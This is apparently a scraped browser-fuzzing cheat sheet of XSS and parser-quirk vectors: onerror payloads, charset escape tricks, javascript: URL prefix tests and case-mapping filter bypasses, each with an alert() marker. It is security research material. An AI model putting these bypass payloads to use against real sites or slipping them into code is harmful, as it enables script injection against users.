Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 177 vectors with results
<script>"\\"-alert(92)//"</script>This vector demonstrates that certain characters consume backslashes when using a big5 charset
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(0))) { 0x0D
JSON.parse(`{"test":"0x00"}`);0x0D
}0x0D
} catch {0x0D
alert(0);0x0D
}0x0D
Characters that will break a JSON.parse() that do not include chars within standard JSON-format.
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(1))) { 0x0D
JSON.parse(`{"test":"0x01"}`);0x0D
}0x0D
} catch {0x0D
alert(1);0x0D
}0x0D
Characters that will break a JSON.parse() that do not include chars within standard JSON-format.
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(2))) { 0x0D
JSON.parse(`{"test":"0x02"}`);0x0D
}0x0D
} catch {0x0D
alert(2);0x0D
}0x0D
Characters that will break a JSON.parse() that do not include chars within standard JSON-format.
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(3))) { 0x0D
JSON.parse(`{"test":"0x03"}`);0x0D
}0x0D
} catch {0x0D
alert(3);0x0D
}0x0D
Characters that will break a JSON.parse() that do not include chars within standard JSON-format.
try {0x0D
standard_chars = [0x0D
`"`, `'`, `,`, `\n`, `\t`, `\r`, `}`, `{`, `\\`0x0D
];0x0D
0x0D
if (!standard_chars.includes(String.fromCodePoint(4))) { 0x0D
JSON.parse(`{"test":"0x04"}`);0x0D
}0x0D
} catch {0x0D
alert(4);0x0D
}0x0D
Characters that will break a JSON.parse() that do not include chars within standard JSON-format.
let transformedChr = String.fromCodePoint(0).toUpperCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)This vector demonstrates which codePoints transform to ascii characters when using toUpperCase() Related vector: https://shazzer.co.uk/vectors/661713f26438aee019a61a71
<a id="0x1B$@"></a>0x1B(B<a id="><img src=x onerror=alert(64)></a>Which escape sequences will result in scrambled HTML.
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>Which escape sequences will result in scrambled HTML.
let transformedChr = String.fromCodePoint(0).toLowerCase();0x0D
0 > 0x7f &&0x0D
/^\w+$/.test(transformedChr) &&0x0D
alert(0 + '=>' + transformedChr)This vector demonstrates which codePoints transform to ascii characters when using toLowerCase() Related vector: https://shazzer.co.uk/vectors/661713f26438aee019a61a71
<0x1B(<img src onerror=alert(60)>This vector demonstrates how to use the new bytes placeholder. Here we are fuzzing the characters to perform an ASCII escape sequence in ISO-2022-JP.
<0x1B(Bimg src onerror=alert(66)>This vector demonstrates how to use the new bytes placeholder. Here we are fuzzing the characters to perform an ASCII escape sequence in ISO-2022-JP.
<a id="0x1B$B"></a>0x1B(B<a id="><img src=x onerror=alert(66)></a>Which escape sequences will normalize back to valid HTML
<a id="0x1B$B"></a>0x1B(J<a id="><img src=x onerror=alert(74)></a>Which escape sequences will normalize back to valid HTML
anchor.href='/0x09/example.com';0x0D
if(anchor.host === 'example.com')alert(9)This vector shows what characters are allowed inside slashes on an anchor href
anchor.href='///example.com';0x0D
if(anchor.host === 'example.com')alert(47)This vector shows what characters are allowed inside slashes on an anchor href
anchor.href='/\/example.com';0x0D
if(anchor.host === 'example.com')alert(92)This vector shows what characters are allowed inside slashes on an anchor href
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This XSS vector shows what characters can be used before the onerror event.
This vector shows what characters can be used to separate HTML attributes
This vector shows what characters can be used to separate HTML attributes
This vector shows what characters can be used to separate HTML attributes
document⟦09⟧['location'];alert(9)List of characters allowed between an object and the first bracket notation.
document
['location'];alert(10)List of characters allowed between an object and the first bracket notation.
document0x0B['location'];alert(11)List of characters allowed between an object and the first bracket notation.
document0x0C['location'];alert(12)List of characters allowed between an object and the first bracket notation.
document0x0D['location'];alert(13)List of characters allowed between an object and the first bracket notation.
<a href="https://0x09example.com/" id="test9"></a><a href="https://
example.com/" id="test10"></a><a href="https://0x0Dexample.com/" id="test13"></a><a href="https:///example.com/" id="test47"></a><a href="https://@example.com/" id="test64"></a>if (new URL(String.fromCodePoint(0) + "javascript:alert()").protocol=="javascript:"){alert(0)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(1) + "javascript:alert()").protocol=="javascript:"){alert(1)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(2) + "javascript:alert()").protocol=="javascript:"){alert(2)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(3) + "javascript:alert()").protocol=="javascript:"){alert(3)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
if (new URL(String.fromCodePoint(4) + "javascript:alert()").protocol=="javascript:"){alert(4)}Vector to check if any characters are allowed before "javascript:" to still result in a javascript url. Note: compare this vector (JavaScript URL) with HTML DOM: https://shazzer.co.uk/vectors/661652f5c7a9004304ba5539
const c = String.fromCodePoint(i)0x0D
const c_upper = c.toUpperCase()0x0D
if (c_upper.length > c.length && isASCII(c_upper)){0x0D
alert(c)0x0D
}Useful to bypass strict length checks and differentials between toUpperCase() / toLowerCase() .
<div style="/**/color:red;">test</div><div style="font-family:'blah';color:red"></div><a href="//test.com/" id="test47"></a>I want to know which character after a slash is considered a slash and creates a protocol
<a href="/\test.com/" id="test92"></a>I want to know which character after a slash is considered a slash and creates a protocol